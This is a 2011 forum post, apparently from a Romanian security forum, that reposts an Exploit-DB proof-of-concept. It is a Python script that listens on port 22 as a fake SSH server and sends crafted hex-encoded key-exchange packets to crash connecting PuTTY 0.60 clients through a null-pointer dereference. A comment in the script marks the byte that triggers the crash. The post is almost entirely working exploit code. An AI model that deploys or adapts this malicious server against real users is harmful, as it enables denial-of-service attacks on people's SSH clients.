Serar Posted December 24, 2011 Report Posted December 24, 2011 (edited) print "\n"print "----------------------------------------------------------------"print "| putty 0.60 Null Ptr |"print "| Level Smash the Stack |"print "----------------------------------------------------------------"print "\n"import sys, socket, binasciiHOST = sys.argv[1]PORT = 22s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)s.bind((HOST, PORT))s.listen(1)conn, addr = s.accept()buf = [ ("5353482d322e302d57654f6e6c79446f20322e312e330d0a"), ("000001ec0a14b940c70d1910a6effb0e2228c49c0042000000366469666669652d68656c6c6d616" "e2d67726f7570312d736861312c6469666669652d68656c6c6d616e2d67726f757031342d7368613" "10000000f3f407d89a1f204f37373682d647373000000826165733132382d6362632c336465732d6" "362632c626c6f77666973682d6362632c6165733139322d6362632c6165733235362d6362632c726" "96a6e6461656c3132382d6362632c72696a6e6461afb93139322d6362632c72696a6e6461656c323" "5362d6362632c72696a6e6461656c2d636263406c797361746f722e6c69752e73650000008261657" "33132382d6362632c336465732d6362632c626c6f77666973682db1fc632c6165733139322d63626" "32c6165733235362d6362632c72696a6e6461656c3132382d6362632c72696a6e6461656c3139322" "d6362632c72696a6e6461656c3235362d6362632c72696a6e6461656c2d636263406c797361746f7" "22e6c69752e736500000024686d61632d736861312c686d61632d736861312d39362c686d61632d6" "d64352c6e6f6e6500000024686d61632d736861312c686d61632d736861312d39362c686d61632d6" "d64352c6e6f6e65000000097a6c69622c6e6f6e65000000097a6c69622c6e6f6e650000000000000" "111001111111111111111111111111111"), ## The 00 controls the crash ("0000023c091f00000095000000077373682d72736100000001230000008100d207286d90ff369d3" "64d9e3606ff18d6162088b426894f6216ca7709f7faa22d2e32065064d9c899a687746f3197fcc3c" "76d8cc643afdf14ba36252516f2b8b9ff3b131645f22bfd5f4b0b980acb4985e1c73bc3248559edd" "85fc2435d79e10462e1b662161e12fbc515a20a22ddd8901a1b5a231867d8f34d2196bfa01ddc5b0" "000010100847a283aff19a2abfe32490a2a941179c0c8076ab32421040d3ae88e6086049b53a9b97" "3967991ed7625dd05c85a54b4067d9e9941506158b9927002e71b84630f445eac743cf6050c5b43d" "a22cb8b7f559bb6f425c190b026e790f6924bf2d677f433674d1e31b71acc224c1c5979416f8f06a" "f70e92559b53ca23b82c852ec67ad35380e0d14ae96681bc4bddd3f73204cfc43b981fae94537a15" "3766aecd1ad963de610210b37f871b4b2939c934115ee3798062747bc22af375ba14b68077757bf3" "b45edf6ee8998f6f33a25092cb7789eb08c77cc2f26fb9507dad63f4a077cb5af5dbf248facde1ca" "75f95e84d4b2786fe9799dc20e9195853628132b40000008f000000077373682d727361000000804" "20087d6c6d46453e1bd004c715ced8814674435d48cb897e5141c03f15af86d93ac98a3376d963bc" "6915b98f7157418a9e0cef85a66b1ba855782848b9ae9e5a83ae051ee298299b27056020c4598045" "ae6eb61f5b2537adb07fa2e7733ab83907d9c61eb11f237f8e0b4a51b544687a4eec2a1be2a1dcbf" "cac4453d629a47d000000000000000000"), ("0000000c0a15a1640000c32700008e14") ]i = 0for i in range(0,len(buf)): conn.send(binascii.unhexlify(buf[i])) i+=1conn.close()s.close()Source : http://www.exploit-db.com/exploits/18270/ Edited December 24, 2011 by Serar Quote
Serar Posted December 24, 2011 Author Report Posted December 24, 2011 scuze crezusem ca am pus sursa Quote